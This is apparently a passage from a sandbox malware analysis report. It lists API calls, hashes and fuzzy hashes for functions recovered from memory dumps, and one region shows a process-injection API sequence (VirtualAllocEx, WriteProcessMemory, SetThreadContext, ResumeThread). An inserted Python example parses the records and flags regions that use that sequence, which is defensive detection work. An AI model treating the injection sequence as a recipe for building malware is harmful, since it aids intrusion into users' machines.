                                          • Opcode Fuzzy Hash: e95a9909324a690cffba7ea3356f4c5d31161eb8e7101b9bd17f24fbff88e5cb
                                          • Instruction Fuzzy Hash: 2D2125B1E016488BEB58CFABD9442DEBBB3AFC8310F14C06AD509B6258DB344A49CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB8D0
                                          • GetCurrentThread.KERNEL32 ref: 00EDB90D
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 00EDB9A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID: n9"k
                                          • API String ID: 2063062207-2899673027
                                          • Opcode ID: 504d3733648caa8374f8fe394229e62d3b2656baeca25128ab9c10be15bfbebb
                                          • Instruction ID: 3d672ae280f78e1ea6256a272354423100d1b9041c03c5398b620700b3cb2539
                                          • Opcode Fuzzy Hash: 504d3733648caa8374f8fe394229e62d3b2656baeca25128ab9c10be15bfbebb
                                          • Instruction Fuzzy Hash: 555132B4900249DFDB24DFAAD948B9EBBF5FB88318F24809AE009B7350D7759844CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB8D0
                                          • GetCurrentThread.KERNEL32 ref: 00EDB90D
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 00EDB9A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID: n9"k
                                          • API String ID: 2063062207-2899673027
                                          • Opcode ID: 7e94dc9840f2678f69b45820a8ef48c272c79f9e553bf13c3d95b282991a18ed
                                          • Instruction ID: f75b65b70df1f6bb2486617b56fc9534a9a849e4570d4ec7978b0b5dbea98eb2
                                          • Opcode Fuzzy Hash: 7e94dc9840f2678f69b45820a8ef48c272c79f9e553bf13c3d95b282991a18ed
                                          • Instruction Fuzzy Hash: 5E5143B4900249CFDB24DFAAD948B9EBBF5FB88318F24809AE009B7350D7749844CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00ED97CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: TP$TP$n9"k
                                          • API String ID: 4139908857-720568475
                                          • Opcode ID: 4becfe21276d2d30743478d8a195a84c5eafdbe8415dee7ad5b9f1025380632a
                                          • Instruction ID: 4ff6de9d3c7b786d47a628d58c87d728146cf1486a747395f289bcf6fe7e3432
                                          • Opcode Fuzzy Hash: 4becfe21276d2d30743478d8a195a84c5eafdbe8415dee7ad5b9f1025380632a
                                          • Instruction Fuzzy Hash: 63711370A00B059FDB24DF2AD54175ABBF1FB88308F00992AE45AE7B51DB75E806CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 011135F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: n9"k
                                          • API String ID: 963392458-2899673027
                                          • Opcode ID: a051f7fe9e4819dc8cd9262b2a018e6ec59287d790b805e13be1e56b08464b3e
                                          • Instruction ID: 59d926f37a31d03d7d1e55972882261cc53dd2e4e619eb630b9a779a2176ede1
                                          • Opcode Fuzzy Hash: a051f7fe9e4819dc8cd9262b2a018e6ec59287d790b805e13be1e56b08464b3e
                                          • Instruction Fuzzy Hash: EE512571900318DFDB64CF99C880BDEBBB5BF48314F1584AAE908B7254DB709A88CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 011135F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: n9"k
                                          • API String ID: 963392458-2899673027
                                          • Opcode ID: ba27cfb782e96271434e866ff8fe0d615872c17b3a999e3b0982670777b45b2a
                                          • Instruction ID: fe63e77cd54012e2fdda28f5eab5d025e3caf7d93f02261186234308d7e4b40a
                                          • Opcode Fuzzy Hash: ba27cfb782e96271434e866ff8fe0d615872c17b3a999e3b0982670777b45b2a
                                          • Instruction Fuzzy Hash: 75510471900319DFDB64DF99C880BDDBBB6BF48314F1584AAE908B7254DB319A88CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00ED5661
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID: n9"k
                                          • API String ID: 2289755597-2899673027
                                          • Opcode ID: 947920c245cd8bf623bc8d152d8c362175b224e860ced198b0d5474596d727e9
                                          • Instruction ID: 3610eb6b296218884a3452043afd643b6f56e44066debdb6d098529a71f946c6
                                          • Opcode Fuzzy Hash: 947920c245cd8bf623bc8d152d8c362175b224e860ced198b0d5474596d727e9
                                          • Instruction Fuzzy Hash: 29512371C04618CFDB20DFA9C84479EBBB5FF49308F2480AAD458AB251D775A94ACF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00ED5661
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID: n9"k
                                          • API String ID: 2289755597-2899673027
                                          • Opcode ID: b18b3029368ba3d4b7a49e37ec125c84747c5d7f4bc9ae7769ab9827598990d4
                                          • Instruction ID: afda5d9d199f84e9e30cd722d5af43db1af3fa96bcf4a83b268d7d00f2f91ad4
                                          • Opcode Fuzzy Hash: b18b3029368ba3d4b7a49e37ec125c84747c5d7f4bc9ae7769ab9827598990d4
                                          • Instruction Fuzzy Hash: 4D41F2B1C00618CFDB24DFA9C844B9DBBB5FF48308F60806AD418BB251DB756946CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ED9849,00000800,00000000,00000000), ref: 00ED9A5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: n9"k
                                          • API String ID: 1029625771-2899673027
                                          • Opcode ID: 586d3c7c05e4b972dd0d564deffaa57cfc59808d3e3688a146d4b34c2125afbf
                                          • Instruction ID: 7a05286c48be53885c7c7521a84c66148273db147733c9111435a6ec8f76ac92
                                          • Opcode Fuzzy Hash: 586d3c7c05e4b972dd0d564deffaa57cfc59808d3e3688a146d4b34c2125afbf
                                          • Instruction Fuzzy Hash: 61219CB28083898FCB11DFA9C894ADAFFF4EF56354F1584AED095AB201C374A546CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01113AD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID: n9"k
                                          • API String ID: 3559483778-2899673027
                                          • Opcode ID: ed531dd01e8a063154ad11af60d5fa266a3f1e150731f118c39138e711965350
                                          • Instruction ID: b04b9b00706ff0afa4c8c55906db3a3c07b594dccea91121a658b3b7af0587e0
                                          • Opcode Fuzzy Hash: ed531dd01e8a063154ad11af60d5fa266a3f1e150731f118c39138e711965350
                                          • Instruction Fuzzy Hash: DD21F3B2D002499FDB14CF9AD885BDEBBF4FB48320F10842AE519A3240D778A944CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01113AD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID: n9"k
                                          • API String ID: 3559483778-2899673027
                                          • Opcode ID: 7c2256f22e09fc0a5d0ddbf4eb3c91dc14c8bb1ee164bab3a1b6d2ce6b353710
                                          • Instruction ID: fb465eab2c1a05a02d8622cfd506f7229bcf91e077d227322b9f79ca8eb9a0e2
                                          • Opcode Fuzzy Hash: 7c2256f22e09fc0a5d0ddbf4eb3c91dc14c8bb1ee164bab3a1b6d2ce6b353710
                                          • Instruction Fuzzy Hash: 9F2105B19002499FCB14CF9AD885BDEFBF4FB48320F10842AE518E3240D778A544CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDBF27
Memory Dump Source
• Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID: n9"k
• API String ID: 3793708945-2899673027
• Opcode ID: af0fd701e73177d056265513c3ecc7dd5453ababf2958f4973924bbabbd6fcde
• Instruction ID: c0778caaf8b6703f5dd33f678b5f9d9b56d15fb8ce9f2100bf6c56883eb9736e
• Opcode Fuzzy Hash: af0fd701e73177d056265513c3ecc7dd5453ababf2958f4973924bbabbd6fcde
• Instruction Fuzzy Hash: 6821F4B5D00248DFCB10CFA9D884AEEFBF4EB48324F14801AE914A3310D374A954CF60
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDBF27
Memory Dump Source
• Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID: n9"k
• API String ID: 3793708945-2899673027
• Opcode ID: 9d916e6cda2efae51a88e755150eaba68531be7159114aa5fd8d84acb6e0e76e
• Instruction ID: ac511ef68d29e6f93325972650e9fce4c8e3f6bb2f39a57e070433801e41e5ac
• Opcode Fuzzy Hash: 9d916e6cda2efae51a88e755150eaba68531be7159114aa5fd8d84acb6e0e76e
• Instruction Fuzzy Hash: FB21B3B5900249AFDB10CFAAD984ADEFBF8EB48324F15841AE955A3310D374A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 01113887
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: ContextThread
• String ID: n9"k
• API String ID: 1591575202-2899673027
• Opcode ID: a372796f2503c4bf14a909f65880d03bfe77b88ed12f25075c8d84c5d74f85dd
• Instruction ID: ce3494f409cee639e9a4d0a86f2fa704f7911ac827fc67ee2977ee1c0114866f
• Opcode Fuzzy Hash: a372796f2503c4bf14a909f65880d03bfe77b88ed12f25075c8d84c5d74f85dd
• Instruction Fuzzy Hash: 1B2158B1D0021A9FDB14CF9AD885BDEFBF4FB48620F14816AE418B3240D778A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0111394F
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: MemoryProcessRead
• String ID: n9"k
• API String ID: 1726664587-2899673027
• Opcode ID: 08c735928baefbec32a5f039ff39a2ffe9bfe75c104575937b28b236941a0149
• Instruction ID: e25a7fc959ccfe2eafa7e082de08c379e8a1e5eb5f9c7c6b7cd952fef4f6b69d
• Opcode Fuzzy Hash: 08c735928baefbec32a5f039ff39a2ffe9bfe75c104575937b28b236941a0149
• Instruction Fuzzy Hash: 442107B1D012499FCB20CF9AD885BDEFBF5FB48320F10842AE968A3240D334A544CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0111394F
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: MemoryProcessRead
• String ID: n9"k
• API String ID: 1726664587-2899673027
• Opcode ID: 1ebf1b0dd0bece131c2665bcbb3bf04daccb9216c03dfaec409bd5ced1a60324
• Instruction ID: b20894b5416a2d7b93437aa4e756d01af544e7908820b3a6ecc281fa5d64c4bc
• Opcode Fuzzy Hash: 1ebf1b0dd0bece131c2665bcbb3bf04daccb9216c03dfaec409bd5ced1a60324
• Instruction Fuzzy Hash: B421E2B19012499FCB10CF9AD985BDEFBF5FB48320F10842AE968A3250D378A544CFA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 01113887
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: ContextThread
• String ID: n9"k
• API String ID: 1591575202-2899673027
• Opcode ID: abca25c8be2ac1a68702b44254b81d711021380c85d1c80f8d2fe88b18564f4a
• Instruction ID: d9e1c6d5a083fcfc0808d5fc2b8c4ee8d5f95775ecf7b085f3078457f16c3567
• Opcode Fuzzy Hash: abca25c8be2ac1a68702b44254b81d711021380c85d1c80f8d2fe88b18564f4a
• Instruction Fuzzy Hash: FE2138B1D102199FCB14CF9AD985BDEFBF4FB48620F14816AD418B3240D778A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ED9849,00000800,00000000,00000000), ref: 00ED9A5A
Memory Dump Source
• Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID: n9"k
• API String ID: 1029625771-2899673027
• Opcode ID: 022247b148ef452e5fb23f3b4d292e4095452543eab57b8a9454d860590588f7
• Instruction ID: d19ad82d748aae681bcc51aeeced76a9442a8b1ce10fdc04d029d6f9f63c0582
• Opcode Fuzzy Hash: 022247b148ef452e5fb23f3b4d292e4095452543eab57b8a9454d860590588f7
• Instruction Fuzzy Hash: D92136B28002099FCB10DFAAD844BDEFBF4EB49324F14842AE455B7200C375A546CFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ED9849,00000800,00000000,00000000), ref: 00ED9A5A
Memory Dump Source
• Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID: n9"k
• API String ID: 1029625771-2899673027
• Opcode ID: 0b18d19502344a98b8368b59ee94830329996998d0d12fea279893ea623082ee
• Instruction ID: e15fc0e98e19016e83f9af2c88b28e21d0f9451eab6cd2d5b456abdbe0eae9a5
• Opcode Fuzzy Hash: 0b18d19502344a98b8368b59ee94830329996998d0d12fea279893ea623082ee
• Instruction Fuzzy Hash: DA11D6B69002099FCB20DF9AD844BDEFBF4EB88324F15842AE515B7301C375A945CFA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01113A0B
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: AllocVirtual
• String ID: n9"k
• API String ID: 4275171209-2899673027
• Opcode ID: 186661543d30803facfd5928644247093487a6e9db7843e8bb4dc9e1859b6a1e
• Instruction ID: 1f97b0eb26f0e1ebb00cd5b06489e30de6986a2aad769bd1ee97f2083ec79dd8
• Opcode Fuzzy Hash: 186661543d30803facfd5928644247093487a6e9db7843e8bb4dc9e1859b6a1e
• Instruction Fuzzy Hash: 361104B6D002499FCB20DF9AD885BDEFBF4FB48324F148419E529A7210C335A544CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01113A0B
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: AllocVirtual
• String ID: n9"k
• API String ID: 4275171209-2899673027
• Opcode ID: dd93c5b9e0d042114c289f977b2b9d9ae8f119ee24069829d54c8ffcbf91d9fa
• Instruction ID: 800b2ec5e4579ad006a7e15cc7ff356e89f26bf1326bec2d757ecd23fefa5d7d
• Opcode Fuzzy Hash: dd93c5b9e0d042114c289f977b2b9d9ae8f119ee24069829d54c8ffcbf91d9fa
• Instruction Fuzzy Hash: CF11F5B69002499FCB20DF9AD985BDEFFF8FB48324F148419E529A7210C375A544CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00ED97CE
Memory Dump Source
• Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID: n9"k
• API String ID: 4139908857-2899673027
• Opcode ID: 7519281340135212bf8a3dc12257534c5f1c14d8b220ff5f6d4f58ca67ea0b88
• Instruction ID: ee7f1a01cdd4c8ef7c92714852d2a2f8dde0d4cf489b889bb05e8af86649670a
• Opcode Fuzzy Hash: 7519281340135212bf8a3dc12257534c5f1c14d8b220ff5f6d4f58ca67ea0b88
• Instruction Fuzzy Hash: 4C11C0B5D006498FCB20CF9AD844B9EFBF5EB88324F14845AD419B7700C375A545CFA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID: n9"k
• API String ID: 947044025-2899673027
• Opcode ID: 03139c6640613622c41a6eef138e9b418a2c01588267e5805bffe36933e85a51
• Instruction ID: 8afb33dd47ed8c8661a155e6015672d97831e097d587f724d1a03f9c2ae894cc
• Opcode Fuzzy Hash: 03139c6640613622c41a6eef138e9b418a2c01588267e5805bffe36933e85a51
• Instruction Fuzzy Hash: 5E1103B18002498FDB20CF9AD584BDEFBF4EB88324F24846AD529A3240C374A544CFA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 011145A5
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: MessagePost
• String ID: n9"k
• API String ID: 410705778-2899673027
• Opcode ID: d1c1421ee5b931d312caf42eeb2e03e996435de287834bc97298e6a693df8f9d
• Instruction ID: 4e3782748226660f9319fe7c1a371e2b44e7aee90a6f6300cc1fef695054546b
• Opcode Fuzzy Hash: d1c1421ee5b931d312caf42eeb2e03e996435de287834bc97298e6a693df8f9d
• Instruction Fuzzy Hash: 0811F2B58003499FDB60CF99D885BDEFBF8EB48324F148859E955A7600C378A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 011145A5
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: MessagePost
• String ID: n9"k
• API String ID: 410705778-2899673027
• Opcode ID: c56e1215fefb9805fb488bb40100bd8fa52c01f0c52eb2a4dc5d7a2d5904dc8e
• Instruction ID: fd6ca0ef47d5ef3211a5b2e052a1d9d07ed6ac4500aff7ec0d75b36d3871aa5b
• Opcode Fuzzy Hash: c56e1215fefb9805fb488bb40100bd8fa52c01f0c52eb2a4dc5d7a2d5904dc8e
• Instruction Fuzzy Hash: E91112B58003499FDB20CF9AD889BDEFBF8FB48724F10841AE915A7600C374A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID: n9"k
• API String ID: 947044025-2899673027
• Opcode ID: a9dc54a4ca0c34a792a9481f2245a317ce5259f901b9e66aff52e8e53d7b9f37
• Instruction ID: ebdcb1a1cd45e45994c695c5aacbb2c19a54b6a3b96024a9356215e13640ebb6
• Opcode Fuzzy Hash: a9dc54a4ca0c34a792a9481f2245a317ce5259f901b9e66aff52e8e53d7b9f37
• Instruction Fuzzy Hash: B41115B18002498FCB20DF9AD585BDEFBF8FB48324F10845AD529A3300C774A544CFA5
Uniqueness
• Uniqueness Score: -1.00%
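
The records above describe, per dumped memory region, which Win32 APIs each recovered function calls: region 01110000 resolves VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, SetThreadContext and ResumeThread, while region 00ED0000 resolves DuplicateHandle, LoadLibraryExW and GetModuleHandleW. The Python below is an added example, not part of the Joe Sandbox report, that parses records in this layout and rolls the API inventory up per region. Its sample input is constructed in the listing's own format with the hash fields omitted; the "API ID" field is used as the report prints it (WriteProcessMemory appears as MemoryProcessWrite, SetThreadContext as ContextThread), and treating the set {AllocVirtual, MemoryProcessWrite, ContextThread, ResumeThread} in one region as a remote-process injection indicator is this example's own heuristic, not a verdict taken from the report.

```python
"""Parse Joe Sandbox-style disassembly records (the APIs / Memory Dump Source /
Similarity / Uniqueness blocks listed above) and summarise, per dumped memory
region, which Win32 APIs the recovered functions call.  Added example, not Joe
Sandbox code; the region-level injection heuristic is this example's own."""
import re
from collections import defaultdict

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness"}
# Matches an APIs bullet such as "DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDBF27"
API_LINE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# The report's "API ID" is a normalised form of the API name (WriteProcessMemory is
# printed as MemoryProcessWrite) and is present even when a record's APIs list is
# empty (the ResumeThread records above), so the heuristic is keyed on it.
HOLLOWING_API_IDS = {"AllocVirtual", "MemoryProcessWrite", "ContextThread", "ResumeThread"}

def _new():
    return {"apis": [], "api_id": "", "region": "", "uniqueness": None}

def parse_records(text):
    """One record per 'Uniqueness Score' line; blank lines and bullets are ignored,
    so the raw listing layout and a bulleted layout parse identically."""
    records, rec, section = [], _new(), None
    for line in filter(None, map(str.strip, text.splitlines())):
        if line in SECTION_HEADERS:
            section = line
            continue
        line = line.lstrip("• ")
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                rec["apis"].append((m["name"], m["module"], m["ref"]))
            continue
        key, _, value = (part.strip() for part in line.partition(":"))
        if key == "Source File":
            m = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
            rec["region"] = m.group(1) if m else ""
        elif key == "API ID":
            rec["api_id"] = value
        elif key == "Uniqueness Score":
            rec["uniqueness"] = float(value.rstrip("%"))
            records.append(rec)
            rec = _new()
    return records

def region_summary(records):
    """Region offset -> {"apis": resolved API names, "api_ids": report API IDs}."""
    out = defaultdict(lambda: {"apis": set(), "api_ids": set()})
    for r in records:
        for name, _module, _ref in r["apis"]:
            out[r["region"]]["apis"].add(name)
        if r["api_id"]:
            out[r["region"]]["api_ids"].add(r["api_id"])
    return dict(out)

def injection_regions(records):
    """Regions whose functions cover the whole HOLLOWING_API_IDS primitive set."""
    return sorted(reg for reg, s in region_summary(records).items()
                  if HOLLOWING_API_IDS <= s["api_ids"])

# Constructed sample in the listing's layout, trimmed to the fields the parser
# reads; the third record keeps the raw layout (score on its own line after a blank).
SAMPLE = """\
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01113A0B
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: AllocVirtual
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 01113887
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: ContextThread
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: ResumeThread
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
Similarity
• API ID: MemoryProcessWrite
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• API ID:
Uniqueness
• Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for region, s in sorted(region_summary(recs).items()):
        print(region, sorted(s["apis"]), sorted(s["api_ids"]))
    print("injection-capable regions:", injection_regions(recs))
```

Records whose APIs list is empty (the ResumeThread entries above) still carry an API ID, which is why the roll-up keys on that field; a string-only record with an empty API ID contributes nothing to its region and is left out of the summary. Pasting the records from this listing into SAMPLE in place of the constructed ones gives the same per-region view of the real dump.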

Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• String ID: DIs7
• API String ID: 0-4141230339
• Opcode ID: 6c1ded5d3db3603f5f306c09b089ddd4a34b54f0a5bcbe565341cbc43855fd93
• Instruction ID: 229dc790dde1969d5bb778b7c76d77ab058be099918b1ecc647342c5692665cc
• Opcode Fuzzy Hash: 6c1ded5d3db3603f5f306c09b089ddd4a34b54f0a5bcbe565341cbc43855fd93
• Instruction Fuzzy Hash: 65319870E053099FDB88DFAAD8005EEBBB2EF89200F04C56AC516BB311D7318905CFA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• String ID: d?
• API String ID: 0-3663673177
• Opcode ID: 59b2457327d9bbccf0fcb77263aff44a9e49c3d598aaf55ff1a0f1a7283928ad
• Instruction ID: 6fb6c1b5b068a016c361323e6efc14ea1c5ffbcb8af74343bd17a49a37d0cf31
• Opcode Fuzzy Hash: 59b2457327d9bbccf0fcb77263aff44a9e49c3d598aaf55ff1a0f1a7283928ad
• Instruction Fuzzy Hash: 0D211D74E05208AFDB45DFA9D584A9EBBF2EF89300F25C4A6E519A7355D730DE01CB40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• String ID: d?
• API String ID: 0-3663673177
• Opcode ID: 24a2dd5c54f59d8e99c2642b6a0b36d6d7dbd230ac1b3230c19ff46938ba98b8
• Instruction ID: 05e293469d12c5832cdb7664d6f2f3f8bfd84e152463c5d9b6c3b2980ba42079
• Opcode Fuzzy Hash: 24a2dd5c54f59d8e99c2642b6a0b36d6d7dbd230ac1b3230c19ff46938ba98b8
• Instruction Fuzzy Hash: 0611DA74E05608EFDB44DFA9D584AAEFBF2EF89300F25C4A5E519A7355D7309A01CB40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• String ID: '{e
• API String ID: 0-1570940953
• Opcode ID: d7e19c038b07cd17a512273668f89b52c558552a1976c42e5bef3bfb4f6c1870
• Instruction ID: 6a62977b18b47db0c9028be851af11b02965577af8fc84057d4178a7d95806df
• Opcode Fuzzy Hash: d7e19c038b07cd17a512273668f89b52c558552a1976c42e5bef3bfb4f6c1870
• Instruction Fuzzy Hash: 1ED0A774402308CFCB58DF71D4989893B71FF05341B1010A4DA155F295C7318A40DF61
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• Opcode ID: 7ec3d909c81592da4cfc3e795fb7f00375a72cea406efd1179b04504a4e8a0f6
• Instruction ID: 5b6129c621b73ce79b8ec1eec6d0adb7baf86462229a8178e8339abb7ba2d598
• Opcode Fuzzy Hash: 7ec3d909c81592da4cfc3e795fb7f00375a72cea406efd1179b04504a4e8a0f6
• Instruction Fuzzy Hash: 8EE19030B102189FCB54EFB4E959AAE7BF6AF89308F119469E405DB3A1DB34DC41CB91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
Similarity
• Opcode ID: 7d8a2bfbf143f262ccfad049cf724eee01b866c6974e07107de4f60764664c2c
